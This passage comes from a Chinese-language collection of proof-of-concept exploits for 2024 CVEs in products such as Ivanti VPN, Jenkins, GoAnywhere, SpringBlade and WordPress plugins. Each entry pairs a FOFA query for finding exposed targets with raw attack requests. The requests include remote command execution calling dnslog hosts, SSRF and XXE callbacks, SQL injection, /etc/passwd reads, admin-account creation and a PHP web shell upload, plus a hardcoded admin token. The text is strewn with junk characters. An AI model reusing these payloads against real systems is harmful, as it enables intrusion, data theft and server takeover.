$ q5 ]( W7 R9 ?9 Y# D; [5 g b3 JX-Requested-With: XMLHttpRequest# S+ V+ z8 m: U, Y# z m
; A. j! h0 x0 `+ q( s
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
+ W/ z! X0 P- q3 N ], |- ~1 A& A' A( `- R
: Y# o3 N2 C ^, u* I99. Ncast盈可视高清智能录播系统busiFacade RCE) V& {7 I- R) a5 N$ ]
CVE-2024-0305
1 A9 |4 u2 X3 c6 A; u& h3 j8 j% xFOFA:app="Ncast-产品" && title=="高清智能录播系统". R7 z- n0 @% @
POST /classes/common/busiFacade.php HTTP/1.1
0 h% i. g$ i. j9 XHost: 192.168.40.130:8080 I9 n9 E3 V. g) r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" K/ q$ e' q% U$ ^
Connection: close# o Y" {1 d$ J; x6 y z
Content-Length: 154$ a$ \1 J2 y6 J$ m- I3 }/ g& ?- |
Accept: */*
8 N) e6 K `0 E3 [7 T5 KAccept-Encoding: gzip, deflate) N7 j9 n5 V, Y2 |4 p" |. I0 y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 v; `1 i. W8 M5 u
Content-Type: application/x-www-form-urlencoded; charset=UTF-8" K% }7 g. ]) ~% L. i7 `
X-Requested-With: XMLHttpRequest4 Z6 ^5 }+ K5 D- e
* M! D) p' m: f4 {%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D2 [" y+ b+ ]4 w* Z. d0 C1 `; s
- X" d0 q2 \, M1 r0 L: `- H
2 J. _2 p$ K; v( p) G" d100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
" n: M3 W: ?* @; s9 J4 UCVE-2024-0352% B' L/ @, J0 B; L
FOFA:icon_hash="874152924"
) L7 ~6 {$ L5 m. P9 Q7 TPOST /api/file/formimage HTTP/1.1
/ W0 G+ C' z0 S; J4 h/ ~Host: 192.168.40.130$ P$ v2 M# [# t) G
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36, M, j4 \4 |3 ]1 k0 w4 P: K
Connection: close2 P7 B& e: e! N/ o0 c! c8 X4 Y
Content-Length: 201
0 D1 b! u' c# D; ?$ K7 p# T7 CContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
3 J2 A8 K; h: J3 z# ^0 vAccept-Encoding: gzip5 `( h! T" j* V( G" b
g5 I. n& P/ S2 d6 u- a) T( v------WebKitFormBoundarygcflwtei' c) E A/ ?' z
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
& L& M9 k! p: M$ p- FContent-Type: application/x-php
) {8 L. W) o4 k: |; r
8 ^3 H* M% c" p# B) C7 h1 b" B9 K2ayyhRXiAsKXL8olvF5s4qqyI2O; `% p% T! {9 M, b! ^
------WebKitFormBoundarygcflwtei--
0 t; f* o# g: O0 X- X, X2 m2 R2 l% C; K6 L: \7 o- n( }+ @ A
7 z8 o( A3 S/ c% s" z
101. ivanti policy secure-22.6命令注入
% f8 \; i9 W$ h9 OCVE-2024-218870 A7 {( n5 }0 z! Z8 u) g
FOFA:body="welcome.cgi?p=logo"0 B/ b5 l' A. B! W* p
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1; {8 k8 H+ q4 Y0 E
Host: x.x.x.xx.x.x.x
$ U1 p2 s. W$ g7 r. qUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.366 O: l' f' x* o- d: X+ s2 n& Q
Connection: close' N( l! m _3 K3 r- ^6 E& p4 p
Accept-Encoding: gzip
9 v U4 ?; H# N( j: x& U5 n, Z! U0 Y d
' Y* x, M1 A2 E2 k2 B102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行7 w1 W; l1 S# d, I7 K2 X6 K! @, o
CVE-2024-218935 {' r1 W) h5 J4 D/ X# B( a7 {
FOFA:body="welcome.cgi?p=logo"4 G5 T" }- Z" s3 y, W+ V. V7 ?
POST /dana-ws/saml20.ws HTTP/1.1
s" C$ a8 q8 H! R( x* L: Z5 {8 CHost: x.x.x.x
2 o! }% H6 p' mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.369 E3 P5 _' O A+ \$ ` P9 w
Connection: close; w9 f# U0 P. E* c
Content-Length: 792, M$ G2 k( @9 ~+ v
Accept-Encoding: gzip* F/ d# q- D! v* @3 I
$ L$ m/ W+ H6 P" R<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
! {: L% R V* R. W
* @5 B# L/ K& p103. Ivanti Pulse Connect Secure VPN XXE0 ~+ [' Y) G2 U5 z3 ^
CVE-2024-22024
' B: q: H }! Y* ]& {7 oFOFA:body="welcome.cgi?p=logo"
/ J S& v9 B' z4 t8 p3 ]POST /dana-na/auth/saml-sso.cgi HTTP/1.15 z' T# {! H( f
Host: 192.168.40.130:111
" m5 Z/ l- r7 h2 M3 @1 L& tUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36) \; l" z7 o: q2 d; ]
Connection: close
: n# x( Y; N/ B. g7 p, kContent-Length: 204: x: n- S( i& E0 I1 ?) e; d2 q* \
Content-Type: application/x-www-form-urlencoded' G# U9 O' i( [2 K$ R7 e
Accept-Encoding: gzip
; W( e' [- O4 h- V- i$ N
% l9 y) |2 D) k) MSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
- K+ s; ?$ l1 d7 s: `- Y+ ^# F% _/ F) y. Y6 V& Z3 |5 q: r8 `
0 n% A: w2 O3 x8 x" C
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
5 {8 c0 J2 {# a- h G$ [1 @) w<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>+ ~/ M; t8 l4 N3 l+ y
3 ?" q# e1 G( f5 S1 h
+ ^8 h) n k5 N/ a104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
* E; B% ]! F! A! _+ Z* p2 k9 NCVE-2024-05696 [7 A; `0 D8 n+ s9 x, [ w6 V! z
FOFA:title="TOTOLINK"3 `- x/ q% g# |
POST /cgi-bin/cstecgi.cgi HTTP/1.16 q+ r7 C/ Q0 j: h9 F$ y% p
Host:192.168.0.1( i% @$ T+ @( u7 J9 ?
Content-Length:41* ?- l+ j; F2 ^# ^9 l0 F8 u
Accept:application/json,text/javascript,*/*;q=0.01
1 u8 i7 S- ~1 |8 `! w7 ^$ |X-Requested-with: XMLHttpRequest) j4 [- S& S& _( x
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
6 o7 ?* T$ S$ F/ NContent-Type: application/x-www-form-urlencoded:charset=UTF-89 q- g3 b8 A5 |9 w% a
Origin: http://192.168.0.1% ]; F% B, p( l& u2 ^
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
9 a: c, l; Z* \Accept-Encoding:gzip,deflate/ F) Q8 d) k: Q/ F; A
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.73 G- R- E z7 i" ]8 E! R" j
Connection:close
3 o5 a0 e1 j% y r1 l5 F% }5 S! N6 @/ R3 h
{- F- R2 W: X. S& |0 ]1 _, J
"topicurl":"getSysStatusCfg",' J; c) F! g. p8 M6 c
"token":""2 V, ] T) [( U# v# m. }
}
; @; L$ n6 }0 ~
. Q/ O6 a0 G5 g! q6 q! K105. SpringBlade v3.2.0 export-user SQL 注入, P7 w. o1 _( u7 `
FOFA:body="https://bladex.vip"
2 c; j4 c, H Z+ thttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1% u6 w9 Q: l: a
; z4 E" f. a3 d+ C! z- m; C
106. SpringBlade dict-biz/list SQL 注入
6 Q G6 E$ G+ K7 BFOFA:body="Saber 将不能正常工作"
% ]: p0 k9 p2 ]. F) vGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
; b. x. w7 }2 e- z; H% o0 y' QHost: your-ip
# ~( `/ T% }4 r' yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 @2 O3 U0 o3 T3 jBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A$ r$ U$ f: k& v/ w+ d# `1 R$ _7 r
Accept-Encoding: gzip, deflate
& [- Y6 Y, @* b# V/ Y4 NAccept-Language: zh-CN,zh;q=0.95 A a% \( \" W t" l/ ^. Q
Connection: close3 b' V, S1 y! }2 J
. g; K+ a/ x6 I$ G$ ?; o/ z: k
6 T, H4 ]5 A% Y6 q" P. z/ d: f/ e107. SpringBlade tenant/list SQL 注入
6 k+ R$ \' U* e; D9 e) v7 [6 U QFOFA:body="https://bladex.vip"' |6 c/ X4 Z3 X
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" F* e1 D9 I6 X5 l: @. o
Host: your-ip9 }3 y+ |+ K. t5 ]2 F9 Q- `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: t8 z* ^0 C% r+ _( U: h9 n JBlade-Auth:替换为自己的
5 B9 o& r. H& f+ ]. {7 iConnection: close1 H& R, A) E% Y! t$ r1 b
9 |; W+ y, S# J1 G
( Z: `$ n# f# g) {) Y108. D-Tale 3.9.0 SSRF1 R% P% r6 f4 z! U, @
CVE-2024-21642
`6 e" o" _4 q- i% Y+ `FOFA:"dtale/static/images/favicon.png"
6 i4 l- R# A6 GGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
5 R- o6 G! G. a" k! O8 {) lHost: your-ip
- Q2 B) A7 A3 q l! dAccept: application/json, text/plain, */*7 i( {9 s: N9 D* a( }) K. Q) P% y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
" c j O% r4 |' s( }1 rAccept-Encoding: gzip, deflate% @& b( @3 C0 w8 H/ d- o7 Q
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
- _9 k$ b6 D* `! e$ t8 k7 p( HConnection: close) k& N: {' n" L* t
+ G) @& h7 k4 ~6 J& ~( u
8 n7 U3 a$ R/ r: x N109. Jenkins CLI 任意文件读取
& t7 _( y" A2 MCVE-2024-23897
. s) L4 o; ]9 n; ^FOFA:header="X-Jenkins"
. h* y1 U/ k( o0 [POST /cli?remoting=false HTTP/1.1
, [- t. _+ j1 w3 U3 c# T9 N5 n3 nHost:
. g: ]0 q5 h( k: c/ i" l. h2 kContent-type: application/octet-stream$ u- X. e5 {' z; H5 V7 {2 I, ~% V
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92) U6 ~1 g) @- {% k
Side: upload
1 ]0 _: D/ P5 a5 K5 bConnection: keep-alive
' ^5 ]# O: T1 p8 p9 PContent-Length: 163# r3 l* G! {3 {' @% f/ v4 m
3 _+ x* r# \. _' n- x i
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'4 K4 G9 r3 u6 r) P V
/ H" i3 \0 R; O$ A& F
+ H2 k1 I! Y8 A5 o
POST /cli?remoting=false HTTP/1.1) ~* K& e: ?! D$ R$ r
Host:2 K7 ~" o. m/ Z. V7 @, `8 U
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92; k' N+ Y" I3 @
download+ J5 i4 v* ]8 t$ Z# M. B5 _; z
Content-Type: application/x-www-form-urlencoded
7 ]5 v( n+ P" dContent-Length: 0
/ l) d& k" e, Z. C1 v. h1 v
/ V" X4 L/ U+ a0 |2 n5 T5 O, M# S/ q, p" |3 A8 L! \7 p9 l7 A' C x. R3 e
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin, u) ?, h& w: b! w. g$ n
java -jar jenkins-cli.jar help
( b! ~! ]) ^; |; _ a[COMMAND]
7 q, s1 ?: I2 X$ O7 z: P& dLists all the available commands or a detailed description of single command.
2 G l4 I) \# }9 ?, ~' Y0 q& d( q COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)5 `6 ~8 M4 ] A: [! H7 `4 F
8 ~9 g$ V6 M- ~4 C
5 ]7 V, Q+ I. @5 s. `& C9 k# w! j) E d110. Goanywhere MFT 未授权创建管理员
. y) K4 X P+ m8 I1 o, J8 A& ?) Z3 J5 ACVE-2024-0204% ?: p& ]6 ~) p B! |7 P; D
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
Z" {7 t* W& k- A# H3 c) o0 aGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
9 k% @& D% F# _5 Q& Q# B, S2 mHost: 192.168.40.130:8000& K ?# T' M+ v6 {& i* f
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 |$ o" T% X* y# s
Connection: close
/ N) o0 }% b* k" Q( r7 ? o% sAccept: */*
% h* \, ^& i' eAccept-Language: en) V8 ^# X2 K$ o; ~: V* ~
Accept-Encoding: gzip6 |3 Q" a4 @' J( _- H4 M
# g+ {3 |$ x. D3 h& R6 H# R5 y$ @
) o% W' U. {; s* v111. WordPress Plugin HTML5 Video Player SQL注入' h+ g/ @9 a% R8 a- P
CVE-2024-1061
a1 x R% s5 V& [FOFA:"wordpress" && body="html5-video-player"7 g8 i$ A2 I8 N+ {6 F
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
! N% ~( K4 i8 t4 xHost: 192.168.40.130:112, a! p/ h* \4 ]8 b! w: w; }. {; c4 W
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36* w7 o* Q3 b) T' V% f
Connection: close ?/ k" {+ m( F( t
Accept: */*
. b5 Y- {9 W. m" s* t. x1 o1 KAccept-Language: en
# I: w/ W y1 |+ i B! aAccept-Encoding: gzip
# O/ L* }, Y1 L( T7 n# W+ t9 E3 c$ O/ t, o
4 t! I# S8 G6 C3 ?) {112. WordPress Plugin NotificationX SQL 注入: ?& ?+ o$ n% L5 w$ c
CVE-2024-1698
- K! R! D! W% h. XFOFA:body="/wp-content/plugins/notificationx"
* C q Z- d4 n/ LPOST /wp-json/notificationx/v1/analytics HTTP/1.1/ w' T" i+ b2 P% \
Host: {{Hostname}}
3 E+ K4 a, D3 }5 F9 JContent-Type: application/json% O; N8 D- f2 `- q' ^: }: X8 W
+ }: y, t6 M6 \, y s{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
2 w$ H8 {. f4 M4 U r3 A! c$ Q0 I v$ u9 |) O7 x, |2 s. h
( |4 c: ?1 W2 {. K113. WordPress Automatic 插件任意文件下载和SSRF
/ Q3 a- f2 @0 ?6 C yCVE-2024-27954% |5 z- O4 [; i" p
FOFA:"/wp-content/plugins/wp-automatic"
8 u2 g1 }' R. J( I; E0 cGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.17 m, e# O7 V( Q. d: ?3 p
Host: x.x.x.x
3 V9 D& C& t: v0 Q, B( ?# I oUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.365 ~. M+ M! c' @5 ]4 H) |2 L o$ {) a
Connection: close0 \5 o% B: o0 ^: g: t, q
Accept: */*
) ~& J3 E- T* C/ c& k4 YAccept-Language: en
, Q5 P$ W) c0 L8 I# ?0 zAccept-Encoding: gzip
8 S( }. y+ }# X6 G* S: L2 x& ?4 l$ R v4 Z. W* A% t& ~/ p7 T# t
. t0 p+ F1 s5 i9 ~9 u
114. WordPress MasterStudy LMS插件 SQL注入
2 k( T% W' c, z. J7 w: \' w7 q& [' MFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
- o* ~8 q* ]7 L4 N5 |6 rGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.14 T# n7 l) ]0 D" L" Y! Z
Host: your-ip
: K5 f$ [- @+ Q) @: V' vUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36- v8 v" I/ b) J
Accept-Charset: utf-8/ Z1 o3 Z, [" a) \4 e+ @
Accept-Encoding: gzip, deflate
0 g& t; ^1 y9 P. [& d& V- QConnection: close
) L# T% S8 u9 }+ A& P+ ?# L) T5 {, ]7 f) A0 O
6 x+ |. [; y" j115. WordPress Bricks Builder <= 1.9.6 RCE
. c0 i7 q% j$ ?7 s. a9 m- z6 B$ FCVE-2024-25600
. `4 T( W+ }( z$ m$ vFOFA: body="/wp-content/themes/bricks/"
* a; \3 [* V% o; |第一步,获取网站的nonce值# H6 f5 f* Z k& Y
GET / HTTP/1.1
8 ]3 b, H3 f2 X1 FHost: x.x.x.x
6 _& D# o- r2 w2 lUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36( A+ v% Q5 x1 R v7 `
Connection: close! f2 `6 \# d3 C# s' ]) Z" a/ ?
Accept-Encoding: gzip3 S1 h$ b9 d# C
z/ q0 B6 E2 r2 x
! [/ x' \1 {6 z' @ l
第二步替换nonce值,执行命令
; N; H* d/ i0 SPOST /wp-json/bricks/v1/render_element HTTP/1.1
4 p. J9 y5 R2 ~ O; N* fHost: x.x.x.x* o/ \0 y$ x: y0 T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
& o! K$ d9 {, R4 ^+ B$ k9 B3 NConnection: close" ~ F# D7 I4 v- H8 `$ @8 t6 e k# y/ |% e
Content-Length: 356
9 X) K- i( ?3 i, ?Content-Type: application/json
1 j) C9 m% l: FAccept-Encoding: gzip4 ~" D2 l7 I5 J' _& g9 }6 t
" ?: h. r; e+ b; |5 A6 @1 E) n
{
+ @: [) d0 p2 {6 Q"postId": "1",
$ o$ X+ C# \$ g9 v; H "nonce": "第一步获得的值",
% d% s( p% K: l! ]* m "element": {
0 b. ^ a) m. m- r2 _' B1 t "name": "container",* o1 c, V' b& u4 m U8 [" n
"settings": {- ~. ~' c/ Q: ^3 N. P8 u
"hasLoop": "true", m1 z! ~/ f4 [$ k( x- D" v' {* R! _
"query": {) b0 G, l- k& J1 X
"useQueryEditor": true,& a; Z3 ~! U- c. i% [" {, q
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",* r) A* O+ } D5 L
"objectType": "post"( @7 N# p% D6 i G: H+ P7 M
}& j& W" j# `- o6 p7 V. y1 u
}
* Z- C6 E. y% ^! u; k }7 c! A* A! V. [5 ]5 K
}% l; r$ b! o- r% J4 X R6 g4 U
+ @' _5 m: C9 J! Y: g/ J
U: j3 G; C6 A: f+ c# `3 l. J- T9 W116. wordpress js-support-ticket文件上传* P0 C* e5 ^6 l7 {* o) E
FOFA:body="wp-content/plugins/js-support-ticket"! }, }% r5 n% U1 Y9 O
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.10 |6 z* s* @9 {& U* M+ {. ^2 R
Host:
- v) U. L% r/ f/ i5 N' [5 QContent-Type: multipart/form-data; boundary=--------767099171
% m0 }- W5 p/ dUser-Agent: Mozilla/5.0
5 ?5 [9 @" e- f0 x6 S4 ^3 ~0 W
8 G. o3 ^; o5 L2 p. S! _& c----------767099171
4 I! O$ `) `$ N0 `Content-Disposition: form-data; name="action"/ b$ K7 x6 L, G9 ~/ s# q" Q8 N
configuration_saveconfiguration) |' Q3 `. ]& ^# d/ p8 y* T# {! `, M
----------767099171
7 z3 t8 m9 J4 H" k! d- i6 dContent-Disposition: form-data; name="form_request"
. c3 q" ~; T3 ]! T$ X+ Ejssupportticket
% a# R5 S, X2 F5 e7 y! S----------767099171) Y2 }( g6 I5 ~) a2 d3 {. m% W
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
+ Y( j: n% U8 WContent-Type: image/png
8 C5 R. e4 H4 Q* `) K2 W6 U----------767099171--
- U0 Z* J" K5 H% K8 ?# i) i. b% U$ K3 `( K
* v# E1 d% x' Z! |, R7 N5 w
117. WordPress LayerSlider插件SQL注入: z5 M0 w# V r: C5 c% F( R
version:7.9.11 – 7.10.0! D; {2 n- Q, ~' K; T
FOFA:body="/wp-content/plugins/LayerSlider/"+ W: t; f- r7 l# X1 v) Y2 E
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
# @. M! L; H; ~/ WHost: your-ip A N8 f( c2 V9 G1 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
" B+ d! @5 w2 D) V/ OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ ^( s: H, C. u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 B5 j, Y; { S2 VAccept-Encoding: gzip, deflate, br
4 _+ r& r& H: T0 C& S- |- ZConnection: close
* R- E0 b! ]& _' h+ tUpgrade-Insecure-Requests: 15 h; j% x# r' Y: J: b! s# h
; t5 T. k- N: F: V/ j4 \
+ I2 E2 ~) i+ Y# ^ t- J5 v
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
2 z; U$ X. |) T, @* J! ~5 oCVE-2024-0939% Y8 ^: z! [0 A6 N; o" N7 D3 w
FOFA:title="Smart管理平台"
7 o0 ]& a, G) W# s4 JPOST /Tool/uploadfile.php? HTTP/1.1
]' g5 r8 q% j+ iHost: 192.168.40.130:8443
& z' m" a4 y1 h5 h! HCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8# l7 x* n0 J; y$ @( f- b- u8 f' Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.09 _0 t1 N. P# _8 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" E; w$ j, P5 P2 B3 R$ S- K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. s) S: |2 i" s( {& f$ S
Accept-Encoding: gzip, deflate
- v2 C# F/ L9 k Z. _% jContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
5 S! M9 t. ?" R7 BContent-Length: 405
, L' h: p- E; Q9 S8 d+ [- V# AOrigin: https://192.168.40.130:8443; n1 o) x6 E1 f8 b
Referer: https://192.168.40.130:8443/Tool/uploadfile.php/ S& y; j6 `4 u6 R. i0 ^
Upgrade-Insecure-Requests: 1) j! C8 V2 T7 U, U+ R# ?
Sec-Fetch-Dest: document/ M" H) }5 j8 A8 g( |
Sec-Fetch-Mode: navigate
3 ?5 X/ ?9 C9 ]) O3 S* { HSec-Fetch-Site: same-origin
! c' K8 w H5 h4 e7 FSec-Fetch-User: ?13 S$ |0 }- `0 K2 c" x
Te: trailers5 R& }1 ~, v( D
Connection: close3 R- d; |: c! I6 f5 T f
6 k. z/ I' H9 t# _-----------------------------13979701222747646634037182887+ `, x3 y0 a: m" V1 W' b
Content-Disposition: form-data; name="file_upload"; filename="contents.php"( o) b# @! l, |/ Q& l
Content-Type: application/octet-stream5 D: X1 ^3 ?- R; f
V' Q. a& y& X( J8 ?1 O; k1 c<?php9 m$ {* B# i/ E" Y
system($_POST["passwd"]);
# n# ]2 R7 N+ q- | S/ c?>
' e2 c( t7 F. M; |& F0 Q1 ^0 A6 s3 M5 L-----------------------------13979701222747646634037182887
2 Z7 d6 D |5 SContent-Disposition: form-data; name="txt_path"
* K! ]1 J/ N" u$ b. b/ W: a6 y
4 R0 l$ Z }. n/home/src.php
' C& N- F4 J( s-----------------------------13979701222747646634037182887--
: W, ~' f7 N0 m% H( i5 q" s$ H% O6 F
. \ F5 Q. h9 m+ n2 ~访问/home/src.php
9 q6 t: K0 Q! }8 @+ @, o8 c# ?! f5 p( N2 ^* ]
119. 北京百绰智能S20后台sysmanageajax.php sql注入
3 n- Y2 n% _3 r4 ECVE-2024-12545 u1 ?2 s8 ~2 X5 P. f+ L/ i Q
FOFA:title="Smart管理平台"
. M; j8 y* \7 ^! r先登录进入系统,默认账号密码为admin/admin
9 T) J' g. A. l" @POST /sysmanage/sysmanageajax.php HTTP/1.114 H( ?9 S; |# t' w0 i7 p4 q
Host: x.x.x.x: P$ H; ~7 N' T+ E/ U9 A N& W
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee1 z, `/ t; w2 G' L6 X) ]# O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0( s7 R- Y' N% L( R; P. V. j6 s
Accept: */** Z! G! C1 u- n3 d, O- r. R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) v+ B& Q- o4 U
Accept-Encoding: gzip, deflate
& u4 m' w1 a# @, O }! iContent-Type: application/x-www-form-urlencoded;; W- u" _/ c/ n* i
Content-Length: 109. @: J( l: [2 L4 h' h& k
Origin: https://58.18.133.60:8443% C2 Z- W1 Y' c7 U o5 L
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
/ i) R3 z( \% E" K7 MSec-Fetch-Dest: empty
+ F6 ^. b& R: `$ Z. TSec-Fetch-Mode: cors& X* Q6 I; y0 J" Y
Sec-Fetch-Site: same-origin1 @) F4 h, q& v+ }3 @
X-Forwarded-For: 1.1.1.10 E: _* h6 l; j. _3 p7 L/ l
X-Originating-Ip: 1.1.1.1
2 v% U( ~/ |" M, @( OX-Remote-Ip: 1.1.1.1- v' u2 c7 _1 r: D* H
X-Remote-Addr: 1.1.1.1
! {' I% y+ y$ Q' _6 l* OTe: trailers/ p7 Y3 Z* r" b2 e; b/ f3 ]
Connection: close
! o4 a$ p' U4 A1 O' U$ F/ s3 P0 H& N6 l2 \
